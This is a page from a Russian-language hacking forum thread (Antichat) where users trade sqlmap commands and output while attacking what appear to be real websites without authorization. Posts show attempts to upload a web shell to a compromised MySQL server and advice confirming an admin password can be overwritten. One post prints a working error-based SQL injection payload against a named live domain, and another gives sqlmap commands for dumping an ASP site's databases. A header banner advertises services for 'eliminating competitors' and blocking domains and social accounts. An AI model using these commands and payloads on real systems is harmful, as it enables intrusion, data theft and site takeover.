Вопросы по SQLMap

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Вопросы по SQLMap

Страница 26 из 115

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#251

29.09.2016, 14:42

t0ma5

Постоянный

Регистрация: 10.02.2012

Сообщений: 830

Провел на форуме:
300820

Репутация: 90

Цитата:

Сообщение от BabaDook

↑
долго объяснять свою мысль, уже флуд будет

такая же фигня, забили

#252

29.09.2016, 23:22

zagruzkaaa

Новичок

Регистрация: 07.07.2009

Сообщений: 5

Провел на форуме:
994403

Репутация: -5

Цитата:

Сообщение от t0ma5

↑
сканеры независимо друг от друга будут работать, как "сканер 1" поймет что сайт "site.com" уже просканирован "сканером 2"? для это же придумали потоки и треды

ну я имел ввиду чтобы сканеры запускать для разных сайтов) например создать отдельный список сайтов для каждого сканера

#253

03.10.2016, 18:47

sinfo

Новичок

Регистрация: 03.10.2016

Сообщений: 21

Провел на форуме:
4811

Репутация: 0

Ничего не могу понять.

[21:06:50] [INFO] testing if current user is DBA

[21:06:50] [INFO] fetching current user

[21:06:50] [INFO] resumed: root@localhost

current user is DBA: True

Цитата:

Сообщение от None

'root'@'localhost' (administrator) [28]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TABLESPACE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE"]

Пытаюсь залить шелл пишет

Цитата:

Сообщение от None

"[WARNING] unable to automatically parse any web server path [INFO] trying to upload the file stager on '/home/ste/public_htm l/admin-ste/' via LIMIT 'LINES TERMINATED BY' method [13:46:37] [WARNING] unable to upload the file stager on '/home/ste/public_ html/admin-ste/' [13:46:37] [INFO] trying to upload the file stager on '/windows-tools/active-dir ectory-manager/' via LIMIT 'LINES TERMINATED BY' method [13:46:39] [WARNING] unable to upload the file stager on '/windows-tools/active- directory-manager/' [13:46:39] [WARNING] HTTP error codes detected during run: 404 (Not Found) - 8 times"]

#254

03.10.2016, 18:50

t0ma5

Постоянный

Регистрация: 10.02.2012

Сообщений: 830

Провел на форуме:
300820

Репутация: 90

Цитата:

Сообщение от sinfo

↑
Ничего не могу понять.
[21:06:50] [INFO] testing if current user is DBA
[21:06:50] [INFO] fetching current user
[21:06:50] [INFO] resumed: root@localhost
current user is DBA: True
Пытаюсь залить шелл пишет

ну рутовый юзер мускула ещё не рут в системе) может быть тупо прав на запись нет

#255

03.10.2016, 18:56

sinfo

Новичок

Регистрация: 03.10.2016

Сообщений: 21

Провел на форуме:
4811

Репутация: 0

Цитата:

Сообщение от t0ma5

↑
ну рутовый юзер мускула ещё не рут в системе) может быть тупо прав на запись нет

А с этими правами я могу перезаписать пасс админа?

#256

03.10.2016, 18:57

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от sinfo

↑
А с этими правами я могу перезаписать пасс админа?

Да. Откуда вы путь взяли? похоже что он не верный, вроде 13 ошибка говорит о том что папка недоступна для записи. Вообщем по логам понять ничего не могу.

С начало у вас

/home/ste/public_htm l/admin-ste/

Потом /windows-tools/active- directory-manager/

#257

03.10.2016, 19:02

sinfo

Новичок

Регистрация: 03.10.2016

Сообщений: 21

Провел на форуме:
4811

Репутация: 0

Цитата:

Сообщение от BabaDook

↑
Потом /windows-tools/active- directory-manager/

Это уже сам мап такое пишет

#258

04.10.2016, 19:31

sinfo

Новичок

Регистрация: 03.10.2016

Сообщений: 21

Провел на форуме:
4811

Репутация: 0

--crawl=2

#259

06.10.2016, 01:35

masterdolicjakov

Новичок

Регистрация: 17.09.2016

Сообщений: 6

Провел на форуме:
1489

Репутация: 0

Доброго всем времени суток!

Парни, помогите решить одну проблемку...

В общем суть дела:

Есть сайт на ASP

Нашел мапом две скули.

Когда прошу чекнуть базу... Выползает огромный список баз в количестве около 120 штук. Хз что такое творится. Задавал пар. --current-db (user), показывало название базы и юзверя. Но вот колонки читать не хочет.

Чекаю так:

1. sqlmap.py -u site.com/site.aspx?s=104 --dbs --threads=10

2. sqlmap.py -u site.com/site.aspx?s=104 -D Base --columns --no-cast --threads=10

#260

06.10.2016, 10:03

sinfo

Новичок

Регистрация: 03.10.2016

Сообщений: 21

Провел на форуме:
4811

Репутация: 0

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: #1* (URI)

Type: error-based

Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)

Payload: http://vapenw.com:80/catalogsearch/result/?cat=-3835) OR 1 GROUP BY

CONCAT(0x716a7a7071,(SELECT (CASE WHEN (3882=3882) THEN 1 ELSE 0 END)),0x716a70

7871,FLOOR(RAND(0)*2)) HAVING MIN(0)#&product_finished=52&q=1&rating=2

---

[22:53:16] [INFO] testing MySQL

[22:53:16] [WARNING] reflective value(s) found and filtering out

[22:53:46] [WARNING] turning off pre-connect mechanism because of connection tim

e out(s)

[22:53:46] [CRITICAL] connection timed out to the target URL. sqlmap is going to

retry the request(s)

[22:55:16] [CRITICAL] connection timed out to the target URL

пробывал с проски результата нуль(

Страница 26 из 115

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход